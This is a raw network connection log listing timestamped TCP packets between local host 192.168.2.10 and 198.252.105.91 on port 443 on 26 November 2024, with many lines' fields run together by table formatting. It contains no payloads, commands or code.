                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.243344069 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.250555038 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.250572920 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.250673056 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.250706911 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.250756979 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.396845102 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.396876097 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.396930933 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.396960974 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.396975994 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.397003889 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.404908895 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.404930115 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.405009031 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.405020952 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.405066967 CET49708443192.168.2.10198.252.105.91
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Nov 26, 2024 08:12:15.413203001 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.413220882 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.413297892 CET  49708        443        192.168.2.10     198.252.105.91
Nov 26, 2024 08:12:15.413307905 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.413464069 CET  49708        443        192.168.2.10     198.252.105.91
Nov 26, 2024 08:12:15.422008991 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.422027111 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.422153950 CET  49708        443        192.168.2.10     198.252.105.91
Nov 26, 2024 08:12:15.422178030 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.422223091 CET  49708        443        192.168.2.10     198.252.105.91
Nov 26, 2024 08:12:15.428462029 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.428482056 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.428595066 CET  49708        443        192.168.2.10     198.252.105.91
Nov 26, 2024 08:12:15.428613901 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.428653955 CET  49708        443        192.168.2.10     198.252.105.91
Nov 26, 2024 08:12:15.437910080 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.437927961 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.437994957 CET  49708        443        192.168.2.10     198.252.105.91
Nov 26, 2024 08:12:15.438004971 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.438039064 CET  49708        443        192.168.2.10     198.252.105.91
Nov 26, 2024 08:12:15.438061953 CET  49708        443        192.168.2.10     198.252.105.91
Nov 26, 2024 08:12:15.446137905 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.446173906 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.446268082 CET  49708        443        192.168.2.10     198.252.105.91
Nov 26, 2024 08:12:15.446276903 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.446319103 CET  49708        443        192.168.2.10     198.252.105.91
Nov 26, 2024 08:12:15.454456091 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.454482079 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.454566956 CET  49708        443        192.168.2.10     198.252.105.91
Nov 26, 2024 08:12:15.454576015 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.454618931 CET  49708        443        192.168.2.10     198.252.105.91
Nov 26, 2024 08:12:15.599214077 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.599237919 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.599354982 CET  49708        443        192.168.2.10     198.252.105.91
Nov 26, 2024 08:12:15.599383116 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.599437952 CET  49708        443        192.168.2.10     198.252.105.91
Nov 26, 2024 08:12:15.606206894 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.606230974 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.606369972 CET  49708        443        192.168.2.10     198.252.105.91
Nov 26, 2024 08:12:15.606395960 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.606436968 CET  49708        443        192.168.2.10     198.252.105.91
Nov 26, 2024 08:12:15.614327908 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.614351034 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.614451885 CET  49708        443        192.168.2.10     198.252.105.91
Nov 26, 2024 08:12:15.614479065 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.614525080 CET  49708        443        192.168.2.10     198.252.105.91
Nov 26, 2024 08:12:15.622693062 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.622719049 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.622808933 CET  49708        443        192.168.2.10     198.252.105.91
Nov 26, 2024 08:12:15.622828007 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.622870922 CET  49708        443        192.168.2.10     198.252.105.91
Nov 26, 2024 08:12:15.630271912 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.630295992 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.630384922 CET  49708        443        192.168.2.10     198.252.105.91
Nov 26, 2024 08:12:15.630410910 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.630450964 CET  49708        443        192.168.2.10     198.252.105.91
Nov 26, 2024 08:12:15.638484001 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.638504028 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.638612986 CET  49708        443        192.168.2.10     198.252.105.91
Nov 26, 2024 08:12:15.638639927 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.638685942 CET  49708        443        192.168.2.10     198.252.105.91
Nov 26, 2024 08:12:15.645665884 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.645694017 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.645740986 CET  49708        443        192.168.2.10     198.252.105.91
Nov 26, 2024 08:12:15.645767927 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.645786047 CET  49708        443        192.168.2.10     198.252.105.91
Nov 26, 2024 08:12:15.645807028 CET  49708        443        192.168.2.10     198.252.105.91
Nov 26, 2024 08:12:15.653824091 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.653852940 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.653960943 CET  49708        443        192.168.2.10     198.252.105.91
Nov 26, 2024 08:12:15.653985023 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.654033899 CET  49708        443        192.168.2.10     198.252.105.91
Nov 26, 2024 08:12:15.799890995 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.799926043 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.800044060 CET  49708        443        192.168.2.10     198.252.105.91
Nov 26, 2024 08:12:15.800081015 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.800127029 CET  49708        443        192.168.2.10     198.252.105.91
Nov 26, 2024 08:12:15.808238983 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.808259964 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.808343887 CET  49708        443        192.168.2.10     198.252.105.91
Nov 26, 2024 08:12:15.808367014 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.808422089 CET  49708        443        192.168.2.10     198.252.105.91
Nov 26, 2024 08:12:15.816224098 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.816241980 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.816334009 CET  49708        443        192.168.2.10     198.252.105.91
Nov 26, 2024 08:12:15.816344023 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.816385984 CET  49708        443        192.168.2.10     198.252.105.91
Nov 26, 2024 08:12:15.823457956 CET  443          49708      198.252.105.91   192.168.2.10
Nov 26, 2024 08:12:15.823481083 CET  443          49708      198.252.105.91   192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.823580027 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.823590040 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.823642015 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.832357883 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.832375050 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.832494974 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.832515001 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.832561970 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.839391947 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.839423895 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.839498997 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.839533091 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.839587927 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.847440004 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.847462893 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.847568989 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.847589970 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.847635984 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.855669975 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.855693102 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.855782032 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.855813026 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:15.855855942 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.001374960 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.001399994 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.001473904 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.001504898 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.001547098 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.009584904 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.009603024 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.009649038 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.009677887 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.009697914 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.009738922 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.017740011 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.017757893 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.017822981 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.017851114 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.017889977 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.024866104 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.024883986 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.024947882 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.024976015 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.025017977 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.033659935 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.033678055 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.033732891 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.033757925 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.033780098 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.033811092 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.041815996 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.041832924 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.041930914 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.041949034 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.041986942 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.049060106 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.049078941 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.049226999 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.049252033 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.049299955 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.057143927 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.057159901 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.057320118 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.057339907 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.057405949 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.202656031 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.202683926 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.202801943 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.202830076 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.614322901 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.614366055 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.621864080 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.621882915 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.621937990 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.621951103 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.621990919 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.622013092 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.629654884 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.629679918 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.629733086 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.629757881 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.629805088 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.637275934 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.637296915 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.637373924 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.637403011 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.637445927 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.645447016 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.645464897 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.645560026 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.645586967 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.645632029 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.654753923 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.654772043 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.654854059 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.654881954 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.654925108 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.660851955 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.660871029 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.660932064 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.660959005 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.660999060 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.806972980 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.806996107 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.807084084 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.807116985 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.807145119 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.807174921 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.815169096 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.815188885 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.815272093 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.815299988 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.815341949 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.823298931 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.823323011 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.823411942 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.823421955 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.823467016 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.833556890 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.833575964 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.833679914 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.833689928 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.833735943 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.839720964 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.839735985 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.839828014 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.839838028 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.839884996 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.846411943 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.846427917 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.846514940 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.846525908 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.846577883 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.854620934 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.854645014 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.854736090 CET49708443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.854753017 CET44349708198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:16.854799032 CET49708443192.168.2.10198.252.105.91
Nov 26, 2024 08:12:16.862840891 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:16.862858057 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:16.862947941 CET 49708 443 192.168.2.10 198.252.105.91
Nov 26, 2024 08:12:16.862958908 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:16.863002062 CET 49708 443 192.168.2.10 198.252.105.91
Nov 26, 2024 08:12:17.009392023 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.009424925 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.009571075 CET 49708 443 192.168.2.10 198.252.105.91
Nov 26, 2024 08:12:17.009603977 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.009618044 CET 49708 443 192.168.2.10 198.252.105.91
Nov 26, 2024 08:12:17.009656906 CET 49708 443 192.168.2.10 198.252.105.91
Nov 26, 2024 08:12:17.016443014 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.016465902 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.016532898 CET 49708 443 192.168.2.10 198.252.105.91
Nov 26, 2024 08:12:17.016545057 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.016586065 CET 49708 443 192.168.2.10 198.252.105.91
Nov 26, 2024 08:12:17.024667025 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.024687052 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.024745941 CET 49708 443 192.168.2.10 198.252.105.91
Nov 26, 2024 08:12:17.024770021 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.024818897 CET 49708 443 192.168.2.10 198.252.105.91
Nov 26, 2024 08:12:17.032793999 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.032810926 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.032880068 CET 49708 443 192.168.2.10 198.252.105.91
Nov 26, 2024 08:12:17.032911062 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.032948971 CET 49708 443 192.168.2.10 198.252.105.91
Nov 26, 2024 08:12:17.040503025 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.040524960 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.040591955 CET 49708 443 192.168.2.10 198.252.105.91
Nov 26, 2024 08:12:17.040612936 CET 443 49708 198.252.105.91 192.168.2.10
Nov 26, 2024 08:12:17.040657997 CET 49708 443 192.168.2.10 198.252.105.91
Nov 26, 2024 08:12:17.048679113 CET 443 49708 198.252.105.91 192.168.2.10
